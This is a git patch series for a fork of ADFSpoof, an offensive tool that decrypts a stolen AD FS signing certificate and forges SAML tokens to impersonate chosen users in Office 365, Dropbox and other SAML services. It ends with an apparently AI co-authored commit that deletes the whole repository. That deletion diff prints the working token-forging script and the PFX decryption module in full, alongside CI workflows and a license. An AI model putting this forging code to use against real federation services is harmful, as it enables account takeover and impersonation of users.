+ "status": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/ADFSpoof status --short || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "fetch": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/ADFSpoof fetch --all --prune || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "log": { + "executor": "nx:run-commands", + "options": { + "command": "git -C repos/ADFSpoof log --oneline -10 || true" + }, + "metadata": { + "supervisorRequired": true + } + }, + "manifests": { + "executor": "nx:run-commands", + "options": { + "command": "find repos/ADFSpoof \\( -name package.json -o -name pyproject.toml -o -name Cargo.toml -o -name go.mod -o -name setup.py \\) -not -path '*/node_modules/*' -not -path '*/testdata/*' -not -path '*/fixtures/*' -print | sort" + }, + "metadata": { + "supervisorRequired": true + } + } + }, + "tags": [ + "scope:repos", + "type:subrepo" + ] +} \ No newline at end of file From 41155bc776bbde1dcd1008b5b78371285ddbfea7 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 1 Apr 2026 08:58:30 +0000 Subject: [PATCH 104/106] chore(deps): bump future from 0.18.3 to 1.0.0 Bumps [future](https://github.com/PythonCharmers/python-future) from 0.18.3 to 1.0.0. - [Release notes](https://github.com/PythonCharmers/python-future/releases) - [Changelog](https://github.com/PythonCharmers/python-future/blob/master/docs/changelog.rst) - [Commits](https://github.com/PythonCharmers/python-future/compare/v0.18.3...v1.0.0) --- updated-dependencies: - dependency-name: future dependency-version: 1.0.0 dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 566b4b2..50039b0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ cffi==2.0.0 cryptography==46.0.5 defusedxml==0.7.1 eight==1.0.1 -future==0.18.3 +future==1.0.0 lxml==6.0.2 pyasn1==0.6.3 pyOpenSSL==26.0.0 From be6c06c62dcc238d305bcacd612212f2810ad425 Mon Sep 17 00:00:00 2001 From: joseguzman1337 Date: Tue, 7 Apr 2026 21:30:57 -0400 Subject: [PATCH 105/106] chore: automated swarm-wide synchronization Co-Authored-By: Claude Sonnet 4.6 --- .github/dependabot.yml | 6 - .github/workflows/auto_merge.yml | 31 ---- .github/workflows/codeql.yml | 78 --------- .github/workflows/dependency-review.yml | 27 ---- .github/workflows/scorecards.yml | 76 --------- .gitignore | 89 ----------- .pre-commit-config.yaml | 14 -- .whitesource | 12 -- ADFSpoof.py | 189 ---------------------- EncryptedPfx.py | 171 -------------------- LICENSE | 201 ------------------------ README.md | 139 ---------------- SamlSigner.py | 26 --- microsoft_kbkdf.py | 138 ---------------- project.json | 47 ------ requirements.txt | 13 -- templates/dropbox.xml | 1 - templates/o365.xml | 1 - templates/saml2.xml | 1 - utils.py | 49 ------ 20 files changed, 1309 deletions(-) delete mode 100644 .github/dependabot.yml delete mode 100644 .github/workflows/auto_merge.yml delete mode 100644 .github/workflows/codeql.yml delete mode 100644 .github/workflows/dependency-review.yml delete mode 100644 .github/workflows/scorecards.yml delete mode 100644 .gitignore delete mode 100644 .pre-commit-config.yaml delete mode 100644 .whitesource delete mode 100644 ADFSpoof.py delete mode 100644 EncryptedPfx.py delete mode 100644 LICENSE delete mode 100644 README.md delete mode 100644 SamlSigner.py delete mode 100644 microsoft_kbkdf.py delete mode 100644 project.json delete mode 100644 requirements.txt delete mode 100644 templates/dropbox.xml delete mode 100644 templates/o365.xml delete mode 100644 templates/saml2.xml delete mode 100644 utils.py diff --git a/.github/dependabot.yml b/.github/dependabot.yml deleted file mode 100644 index 8d20e2e..0000000 --- a/.github/dependabot.yml +++ /dev/null @@ -1,6 +0,0 @@ -version: 2 -updates: - - package-ecosystem: pip - directory: / - schedule: - interval: daily diff --git a/.github/workflows/auto_merge.yml b/.github/workflows/auto_merge.yml deleted file mode 100644 index e0f5cf6..0000000 --- a/.github/workflows/auto_merge.yml +++ /dev/null @@ -1,31 +0,0 @@ -name: Auto Update and Merge - -on: - schedule: - - cron: '*/5 * * * *' # Run every 5 minutes - pull_request_target: - types: [assigned, unassigned, labeled, unlabeled, opened, edited, reopened, synchronize, ready_for_review, locked, unlocked, review_requested, review_request_removed, auto_merge_enabled, auto_merge_disabled] - branches: - - master # Replace 'target-branch' with your actual branch name - - -jobs: - auto-merge: - runs-on: ubuntu-latest - steps: - - name: Checkout code - uses: actions/checkout@v4.1.7 - with: - fetch-depth: 0 # Fetch all history for merging - ref: ${{ github.event.pull_request.head.ref }} # Checkout the PR's branch - - - name: Merge PR into master - run: | - git config --global user.name 'github-actions[bot]' - git config --global user.email 'github-actions[bot]@users.noreply.github.com' - git checkout master - git pull origin master # Ensure master is up-to-date - git merge ${{ github.event.pull_request.head.ref }} --no-ff # Merge the PR's branch - - - name: Push changes - run: git push origin master diff --git a/.github/workflows/codeql.yml b/.github/workflows/codeql.yml deleted file mode 100644 index 2099944..0000000 --- a/.github/workflows/codeql.yml +++ /dev/null @@ -1,78 +0,0 @@ -# For most projects, this workflow file will not need changing; you simply need -# to commit it to your repository. -# -# You may wish to alter this file to override the set of languages analyzed, -# or to provide custom queries or build logic. -# -# ******** NOTE ******** -# We have attempted to detect the languages in your repository. Please check -# the `language` matrix defined below to confirm you have the correct set of -# supported CodeQL languages. -# -name: "CodeQL" - -on: - push: - branches: ["master"] - pull_request: - # The branches below must be a subset of the branches above - branches: ["master"] - schedule: - - cron: "0 0 * * 1" - -permissions: - contents: read - -jobs: - analyze: - name: Analyze - runs-on: ubuntu-latest - permissions: - actions: read - contents: read - security-events: write - - strategy: - fail-fast: false - matrix: - language: ["python"] - # CodeQL supports [ $supported-codeql-languages ] - # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support - - steps: - - name: Harden Runner - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 - with: - egress-policy: audit - - - name: Checkout repository - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - - # Initializes the CodeQL tools for scanning. - - name: Initialize CodeQL - uses: github/codeql-action/init@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 - with: - languages: ${{ matrix.language }} - # If you wish to specify custom queries, you can do so here or in a config file. - # By default, queries listed here will override any specified in a config file. - # Prefix the list here with "+" to use these queries and those in the config file. - - # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). - # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild - uses: github/codeql-action/autobuild@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 - - # ℹ️ Command-line programs to run using the OS shell. - # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun - - # If the Autobuild fails above, remove it and uncomment the following three lines. - # modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance. - - # - run: | - # echo "Run, Build Application using script" - # ./location_of_script_within_repo/buildscript.sh - - - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 - with: - category: "/language:${{matrix.language}}" diff --git a/.github/workflows/dependency-review.yml b/.github/workflows/dependency-review.yml deleted file mode 100644 index 3f34562..0000000 --- a/.github/workflows/dependency-review.yml +++ /dev/null @@ -1,27 +0,0 @@ -# Dependency Review Action -# -# This Action will scan dependency manifest files that change as part of a Pull Request, -# surfacing known-vulnerable versions of the packages declared or updated in the PR. -# Once installed, if the workflow run is marked as required, -# PRs introducing known-vulnerable packages will be blocked from merging. -# -# Source repository: https://github.com/actions/dependency-review-action -name: 'Dependency Review' -on: [pull_request] - -permissions: - contents: read - -jobs: - dependency-review: - runs-on: ubuntu-latest - steps: - - name: Harden Runner - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 - with: - egress-policy: audit - - - name: 'Checkout Repository' - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - - name: 'Dependency Review' - uses: actions/dependency-review-action@0efb1d1d84fc9633afcdaad14c485cbbc90ef46c # v2.5.1 diff --git a/.github/workflows/scorecards.yml b/.github/workflows/scorecards.yml deleted file mode 100644 index 2ee97d5..0000000 --- a/.github/workflows/scorecards.yml +++ /dev/null @@ -1,76 +0,0 @@ -# This workflow uses actions that are not certified by GitHub. They are provided -# by a third-party and are governed by separate terms of service, privacy -# policy, and support documentation. - -name: Scorecard supply-chain security -on: - # For Branch-Protection check. Only the default branch is supported. See - # https://github.com/ossf/scorecard/blob/main/docs/checks.md#branch-protection - branch_protection_rule: - # To guarantee Maintained check is occasionally updated. See - # https://github.com/ossf/scorecard/blob/main/docs/checks.md#maintained - schedule: - - cron: '20 7 * * 2' - push: - branches: ["master"] - -# Declare default permissions as read only. -permissions: read-all - -jobs: - analysis: - name: Scorecard analysis - runs-on: ubuntu-latest - permissions: - # Needed to upload the results to code-scanning dashboard. - security-events: write - # Needed to publish results and get a badge (see publish_results below). - id-token: write - contents: read - actions: read - - steps: - - name: Harden Runner - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 - with: - egress-policy: audit - - - name: "Checkout code" - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0 - with: - persist-credentials: false - - - name: "Run analysis" - uses: ossf/scorecard-action@99c53751e09b9529366343771cc321ec74e9bd3d # v2.0.6 - with: - results_file: results.sarif - results_format: sarif - # (Optional) "write" PAT token. Uncomment the `repo_token` line below if: - # - you want to enable the Branch-Protection check on a *public* repository, or - # - you are installing Scorecards on a *private* repository - # To create the PAT, follow the steps in https://github.com/ossf/scorecard-action#authentication-with-pat. - # repo_token: ${{ secrets.SCORECARD_TOKEN }} - - # Public repositories: - # - Publish results to OpenSSF REST API for easy access by consumers - # - Allows the repository to include the Scorecard badge. - # - See https://github.com/ossf/scorecard-action#publishing-results. - # For private repositories: - # - `publish_results` will always be set to `false`, regardless - # of the value entered here. - publish_results: true - - # Upload the results as artifacts (optional). Commenting out will disable uploads of run results in SARIF - # format to the repository Actions tab. - - name: "Upload artifact" - uses: actions/upload-artifact@a8a3f3ad30e3422c9c7b888a15615d19a852ae32 # v3.1.3 - with: - name: SARIF file - path: results.sarif - retention-days: 5 - - # Upload the results to GitHub's code scanning dashboard. - - name: "Upload to code-scanning" - uses: github/codeql-action/upload-sarif@928ff8c822d966a999092a6a35e32177899afb7c # v2.24.6 - with: - sarif_file: results.sarif diff --git a/.gitignore b/.gitignore deleted file mode 100644 index b01404e..0000000 --- a/.gitignore +++ /dev/null @@ -1,89 +0,0 @@ -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -bin/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec -# Installer logs -pip-log.txt -pip-delete-this-directory.txt -# Unit test / coverage reports -htmlcov/ -.tox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -.hypothesis/ -.pytest_cache/ -# Translations -*.mo -*.pot -# Django stuff: -*.log -local_settings.py -db.sqlite3 -# Flask stuff: -instance/ -.webassets-cache -# Scrapy stuff: -.scrapy -# Sphinx documentation -docs/_build/ -# PyBuilder -target/ -# Jupyter Notebook -.ipynb_checkpoints -# pyenv -.python-version -# celery beat schedule file -celerybeat-schedule -# SageMath parsed files -*.sage.py -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ -# Spyder project settings -.spyderproject -.spyproject -# Rope project settings -.ropeproject -# mkdocs documentation -/site -# mypy -.mypy_cache/ -# macOS system files -.DS_Store -._* diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml deleted file mode 100644 index b09832e..0000000 --- a/.pre-commit-config.yaml +++ /dev/null @@ -1,14 +0,0 @@ -repos: -- repo: https://github.com/gitleaks/gitleaks - rev: v8.16.3 - hooks: - - id: gitleaks -- repo: https://github.com/pre-commit/pre-commit-hooks - rev: v4.4.0 - hooks: - - id: end-of-file-fixer - - id: trailing-whitespace -- repo: https://github.com/pylint-dev/pylint - rev: v2.17.2 - hooks: - - id: pylint diff --git a/.whitesource b/.whitesource deleted file mode 100644 index 55b922e..0000000 --- a/.whitesource +++ /dev/null @@ -1,12 +0,0 @@ -{ - "scanSettings": { - "baseBranches": [] - }, - "checkRunSettings": { - "vulnerableCheckRunConclusionLevel": "failure", - "displayMode": "diff" - }, - "issueSettings": { - "minSeverityLevel": "LOW" - } -} \ No newline at end of file diff --git a/ADFSpoof.py b/ADFSpoof.py deleted file mode 100644 index 4f43579..0000000 --- a/ADFSpoof.py +++ /dev/null @@ -1,189 +0,0 @@ -# POC for PFX -from datetime import datetime, timedelta -from argparse import ArgumentParser -from utils import random_string, encode_object_guid, die, print_intro -from EncryptedPfx import EncryptedPFX -from SamlSigner import SAMLSigner -from urllib import parse -import sys -import json -import base64 - -DEBUG = False - - -def parse_args(): - arg_parser = ArgumentParser() - key_group = arg_parser.add_mutually_exclusive_group(required=True) - key_group.add_argument('-b', '--blob', help='Encrypted PFX blob and decryption key', nargs=2) - key_group.add_argument('-c', '--cert', help='AD FS Signing Certificate') - arg_parser.add_argument('-p', '--password', help='AD FS Signing Certificate Password', default=None) - arg_parser.add_argument('-v', '--verbose', help='Verbose Output', default=False) - arg_parser.add_argument('--assertionid', help='AssertionID string. Defaults to a random string', default=random_string()) - arg_parser.add_argument('--responseid', help='The Response ID. Defaults to random string', default=random_string()) - arg_parser.add_argument('-s', '--server', help='Identifier for the federation service. Usually the fqdn of the server. e.g. sts.example.com DO NOT include HTTPS://') - arg_parser.add_argument('-a', '--algorithm', help='SAML signing algorithm to use', default='rsa-sha256') - arg_parser.add_argument('-d', '--digest', help='SAML digest algorithm to use', default='sha256') - arg_parser.add_argument('-o', '--output', help='Write generated token to the supplied filepath') - - subparsers = arg_parser.add_subparsers( - title='modules', - description='loaded modules', - help='additional help', - dest='command' - ) - - parser_office365 = subparsers.add_parser('o365') - parser_office365.add_argument('--upn', help='Universal Principal Name of user to spoof', required=True) - parser_office365.add_argument('--objectguid', help='Object GUID of user to spoof. You can get this from AD', required=True), - - parser_dropbox = subparsers.add_parser('dropbox') - parser_dropbox.add_argument('--email', help='User email address', required=True) - parser_dropbox.add_argument('--accountname', help='SAM Account Name', required=True) - - parser_generic_saml2 = subparsers.add_parser('saml2') - parser_generic_saml2.add_argument('--endpoint', help='The destination/recipient attribute for SAML 2.0 token. Where the SAML token will be sent.', default=None) - parser_generic_saml2.add_argument('--nameidformat', help='The format attribute for the NameIdentifier element', default=None) - parser_generic_saml2.add_argument('--nameid', help='The NameIdentifier attribute value', default=None) - parser_generic_saml2.add_argument('--rpidentifier', help='The Identifier for the Relying Party', default=None) - parser_generic_saml2.add_argument('--assertions', help='The XML assertions for the SAML token', default=None) - parser_generic_saml2.add_argument('--config', help='JSON file containing generic args', default=None) - - parser_dump = subparsers.add_parser('dump') - parser_dump.add_argument('--path', help='Filepath where the signing token will be output.', default='token.pfx') - - args = arg_parser.parse_args() - if args.verbose: - global DEBUG - DEBUG = True - - command = args.command - if command != 'dump': - if not args.server: - sys.stderr.write("If generating a token you must supply the federation service identifier with --server.\n") - die() - - elif command and command == 'saml2': - saml_set = frozenset([args.endpoint, args.nameidformat, args.nameid, args.rpidentifier, args.assertions]) - - if not args.config and any([arg is None for arg in saml_set]): - sys.stderr.write("If not using a config file you must specify all the other SAML 2.0 args. Quitting.\n") - die() - - return args - - -def get_signer(args): - if args.cert: - password = bytes(args.password, 'utf-8') - with open(args.cert, 'rb') as infile: - pfx = infile.read() - signer = SAMLSigner(pfx, args.command, password=password) - else: - pfx = EncryptedPFX(args.blob[0], args.blob[1]) - decrypted_pfx = pfx.decrypt_pfx() - if args.command == 'dump': - with open(args.path, 'wb') as pfx_file: - pfx_file.write(decrypted_pfx) - signer = None - else: - signer = SAMLSigner(decrypted_pfx, args.command) - - return signer - - -def get_module_params(command): - now = datetime.utcnow() - hour = timedelta(hours=1) - five_minutes = timedelta(minutes=5) - second = timedelta(seconds=1) - token_created = (now).strftime('%Y-%m-%dT%H:%M:%S.000Z') - token_expires = (now + hour).strftime('%Y-%m-%dT%H:%M:%S.000Z') - subject_confirmation_time = (now + five_minutes).strftime('%Y-%m-%dT%H:%M:%S.000Z') - authn_instant = (now - second).strftime('%Y-%m-%dT%H:%M:%S.500Z') - - if command == 'o365': - immutable_id = encode_object_guid(args.objectguid).decode('ascii') - - params = { - 'TokenCreated': token_created, - 'TokenExpires': token_expires, - 'UPN': args.upn, - 'NameIdentifier': immutable_id, - 'AssertionID': args.assertionid, - 'AdfsServer': args.server - } - name_identifier = "AssertionID" - - elif command == 'dropbox': - params = { - 'TokenCreated': token_created, - 'TokenExpires': token_expires, - 'EmailAddress': args.email, - 'SamAccountName': args.accountname, - 'AssertionID': args.assertionid, - 'AdfsServer': args.server, - 'SubjectConfirmationTime': subject_confirmation_time, - 'ResponseID': args.responseid, - 'AuthnInstant': authn_instant - } - name_identifier = "ID" - - elif command == 'saml2': - params = { - 'TokenCreated': token_created, - 'TokenExpires': token_expires, - 'AssertionID': args.assertionid, - 'AdfsServer': args.server, - 'SubjectConfirmationTime': subject_confirmation_time, - 'ResponseID': args.responseid, - 'AuthnInstant': authn_instant - } - - if args.config: - with open(args.config, 'r') as config_file: - data = config_file.read() - try: - saml2_params = json.loads(data) - except json.JSONDecodeError: - sys.stderr.write("Could not parse JSON config file for SAML2 token creation. Quitting.\n") - die() - else: - saml2_params = { - 'SamlEndpoint': args.endpoint, - 'NameIDFormat': args.nameidformat, - 'NameID': args.nameid, - 'RPIdentifier': args.rpidentifier, - 'Assertions': args.assertions - } - params.update(saml2_params) - name_identifier = "ID" - - return params, name_identifier - - -def output_token(token, command): - if command != 'o365': - token = base64.b64encode(token) - token = parse.quote(token) - - return token - - -if __name__ == "__main__": - print_intro() - - args = parse_args() - - signer = get_signer(args) - - if args.command != 'dump': - params, id_attribute = get_module_params(args.command) - - token = signer.sign_XML(params, id_attribute, args.algorithm, args.digest) - - if args.output: - with open(args.output, 'wb') as token_file: - token_file.write(token) - else: - print(output_token(token, args.command)) diff --git a/EncryptedPfx.py b/EncryptedPfx.py deleted file mode 100644 index 5bbb22d..0000000 --- a/EncryptedPfx.py +++ /dev/null @@ -1,171 +0,0 @@ -from cryptography.hazmat.backends import default_backend -from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes -from cryptography.hazmat.primitives import hashes, hmac -from microsoft_kbkdf import ( - CounterLocation, KBKDFHMAC, Mode, -) -from pyasn1.type.univ import ObjectIdentifier, OctetString -from pyasn1.codec.der.decoder import decode as der_decode -from pyasn1.codec.der.encoder import encode -from utils import die, new_guid -import sys -import struct - - -class EncryptedPFX(): - def __init__(self, blob_path, key_path, debug=False): - self.pfx_path = blob_path - self.DEBUG = debug - with open(key_path, 'rb') as infile: - self.decryption_key = infile.read() - with open(self.pfx_path, 'rb') as infile: - self._raw = infile.read() - self.decode() - - def decrypt_pfx(self): - self._derive_keys(self.decryption_key) - self._verify_ciphertext() - - backend = default_backend() - iv = self.iv.asOctets() - cipher = Cipher(algorithms.AES(self.encryption_key), modes.CBC(iv), backend=backend) - decryptor = cipher.decryptor() - plain_pfx = decryptor.update(self.ciphertext) + decryptor.finalize() - - if self.DEBUG: - sys.stderr.write("Decrypted PFX: {0}\n".format(plain_pfx)) - return plain_pfx - - def _verify_ciphertext(self): - backend = default_backend() - h = hmac.HMAC(self.mac_key, hashes.SHA256(), backend=backend) - stream = self.iv.asOctets() + self.ciphertext - h.update(stream) - mac_code = h.finalize() - - if mac_code != self.mac: - sys.stderr.write("Calculated MAC did not match anticipated MAC\n") - sys.stderr.write("Calculated MAC: {0}\n".format(mac_code)) - sys.stderr.write("Expected MAC: {0}\n".format(self.mac)) - die() - if self.DEBUG: - sys.stderr.write("MAC Calculated over IV and Ciphertext: {0}\n".format(mac_code)) - - def _derive_keys(self, password=None): - label = encode(self.encryption_oid) + encode(self.mac_oid) - context = self.nonce.asOctets() - backend = default_backend() - - kdf = KBKDFHMAC( - algorithm=hashes.SHA256(), - mode=Mode.CounterMode, - length=48, - rlen=4, - llen=4, - location=CounterLocation.BeforeFixed, - label=label, - context=context, - fixed=None, - backend=backend - ) - - key = kdf.derive(password) - if self.DEBUG: - sys.stderr.write("Derived key: {0}\n".format(key)) - - self.encryption_key = key[0:16] - self.mac_key = key[16:] - - def _decode_octet_string(self, remains=None): - if remains: - buff = remains - else: - buff = self._raw[8:] - octet_string, remains = der_decode(buff, OctetString()) - - return octet_string, remains - - def _decode_length(self, buff): - bytes_read = 1 - length_initial = buff[0] - if length_initial < 127: - length = length_initial - - else: - length_initial &= 127 - input_arr = [] - for x in range(0, length_initial): - input_arr.append(buff[x + 1]) - bytes_read += 1 - length = input_arr[0] - for x in range(1, length_initial): - length = input_arr[x] + (length << 8) - - if self.DEBUG: - sys.stderr.write("Decoded length: {0}\n".format(length)) - return length, buff[bytes_read:] - - def _decode_groupkey(self): - octet_stream, remains = self._decode_octet_string() - - guid = new_guid(octet_stream) - - if self.DEBUG: - sys.stderr.write("Decoded GroupKey GUID {0}\n".format(guid)) - return guid, remains - - def _decode_authencrypt(self, buff): - _, remains = der_decode(buff, ObjectIdentifier()) - mac_oid, remains = der_decode(remains, ObjectIdentifier()) - encryption_oid, remains = der_decode(remains, ObjectIdentifier()) - - if self.DEBUG: - sys.stderr.write("Decoded Algorithm OIDS\n Encryption Algorithm OID: {0}\n MAC Algorithm OID: {1}\n".format(encryption_oid, mac_oid)) - return encryption_oid, mac_oid, remains - - def decode(self): - version = struct.unpack('>I', self._raw[0:4])[0] - - if version != 1: - sys.stderr.write("Version should be 1 .\n") - die() - - method = struct.unpack('>I', self._raw[4:8])[0] - - if method != 0: - sys.stderr.write("Not using EncryptThenMAC. Currently only EncryptThenMAC is supported.") - die() - - self.guid, remains = self._decode_groupkey() - - self.encryption_oid, self.mac_oid, remains = self._decode_authencrypt(remains) - - self.nonce, remains = self._decode_octet_string(remains) - - if self.DEBUG: - sys.stderr.write("Decoded nonce: {0}\n".format(self.nonce.asOctets())) - - self.iv, remains = self._decode_octet_string(remains) - - if self.DEBUG: - sys.stderr.write("Decoded IV: {0}\n".format(self.iv.asOctets())) - - self.mac_length, remains = self._decode_length(remains) - - if self.DEBUG: - sys.stderr.write("Decoded MAC length: {0}\n".format(self.mac_length)) - - self.ciphertext_length, remains = self._decode_length(remains) - - if self.DEBUG: - sys.stderr.write("Decoded Ciphertext length: {0}\n".format(self.ciphertext_length)) - - self.ciphertext = remains[:self.ciphertext_length - self.mac_length] - - if self.DEBUG: - sys.stderr.write("Decoded Ciphertext: {0}\n".format(self.ciphertext)) - - self.mac = remains[self.ciphertext_length - self.mac_length:] - - if self.DEBUG: - sys.stderr.write("Decoded MAC: {0}\n".format(self.mac)) diff --git a/LICENSE b/LICENSE deleted file mode 100644 index 261eeb9..0000000 --- a/LICENSE +++ /dev/null @@ -1,201 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you 